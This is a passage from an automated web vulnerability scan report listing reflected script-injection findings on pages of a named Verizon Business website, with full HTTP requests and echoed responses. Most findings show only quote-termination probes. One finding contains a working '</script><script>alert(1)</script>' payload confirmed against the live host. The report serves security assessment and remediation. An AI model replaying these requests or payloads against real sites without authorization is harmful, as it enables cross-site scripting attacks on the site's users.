The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b50ce"%3bf5fbc0d529f was submitted in the REST URL parameter 1. This input was echoed as b50ce";f5fbc0d529f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /veb50ce"%3bf5fbc0d529f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:51 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Esta p..gina no existe";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/veb50ce";f5fbc0d529f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1135. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6eda'%3bb0caee58f37 was submitted in the REST URL parameter 1. This input was echoed as a6eda';b0caee58f37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwidea6eda'%3bb0caee58f37/resources/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwidea6eda';b0caee58f37/resources/media/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1136. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b2a"%3b02fede176e7 was submitted in the REST URL parameter 1. This input was echoed as e3b2a";02fede176e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwidee3b2a"%3b02fede176e7/resources/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwidee3b2a";02fede176e7/resources/media/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FO
...[SNIP]...

1.1137. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea866"%3b0520771f409 was submitted in the REST URL parameter 2. This input was echoed as ea866";0520771f409 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesea866"%3b0520771f409/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40710
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resourcesea866";0520771f409/media/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.1138. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c774d'%3bf4b70559c43 was submitted in the REST URL parameter 2. This input was echoed as c774d';f4b70559c43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesc774d'%3bf4b70559c43/media/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40708
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resourcesc774d';f4b70559c43/media/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1139. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42c67'%3b24e3ecd4da4 was submitted in the REST URL parameter 3. This input was echoed as 42c67';24e3ecd4da4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media42c67'%3b24e3ecd4da4/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/media42c67';24e3ecd4da4/index-131046-wifi+shopping+borders.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1140. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e439"%3b61de4f4386a was submitted in the REST URL parameter 3. This input was echoed as 5e439";61de4f4386a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media5e439"%3b61de4f4386a/index-131046-wifi+shopping+borders.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40318
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media5e439";61de4f4386a/index-131046-wifi+shopping+borders.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.1141. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index-131046-wifi+shopping+borders.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d7dd</script><script>alert(1)</script>001464c44cd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/index-131046-wifi+shopping+borders.xml4d7dd</script><script>alert(1)</script>001464c44cd HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "e82b5580bcccf7c9d14a452f89a90d93"
Last-Modified: Wed, 17 Nov 2010 01:02:05 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:02:05 GMT
Content-Length: 21366
Connection: close
Set-Cookie: BERT=VRID%3d4477ad6b-1eb2-4d30-b29d-415b503ffda3|VTID%3d5efb350f-943f-451a-9dc6-bc8d057cd59b|SX%3d1289956925|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:05:49 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:02:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/worldwide/resources/media/index-131046-wifi+shopping+borders.xml4d7dd</script><script>alert(1)</script>001464c44cd</url>
...[SNIP]...

1.1142. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3d63"%3ba3f3085eb7c was submitted in the REST URL parameter 1. This input was echoed as b3d63";a3f3085eb7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwideb3d63"%3ba3f3085eb7c/resources/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwideb3d63";a3f3085eb7c/resources/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.1143. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17d46'%3b465f1de14ef was submitted in the REST URL parameter 1. This input was echoed as 17d46';465f1de14ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide17d46'%3b465f1de14ef/resources/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:25 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide17d46';465f1de14ef/resources/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1144. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36a93'%3b822ce9279c7 was submitted in the REST URL parameter 2. This input was echoed as 36a93';822ce9279c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources36a93'%3b822ce9279c7/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:47 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources36a93';822ce9279c7/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1145. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7d73"%3b949b3becdb0 was submitted in the REST URL parameter 2. This input was echoed as f7d73";949b3becdb0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesf7d73"%3b949b3becdb0/media/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:35 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resourcesf7d73";949b3becdb0/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.1146. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba5c'%3bdfc24057dbd was submitted in the REST URL parameter 3. This input was echoed as dba5c';dfc24057dbd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/mediadba5c'%3bdfc24057dbd/index.xml?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
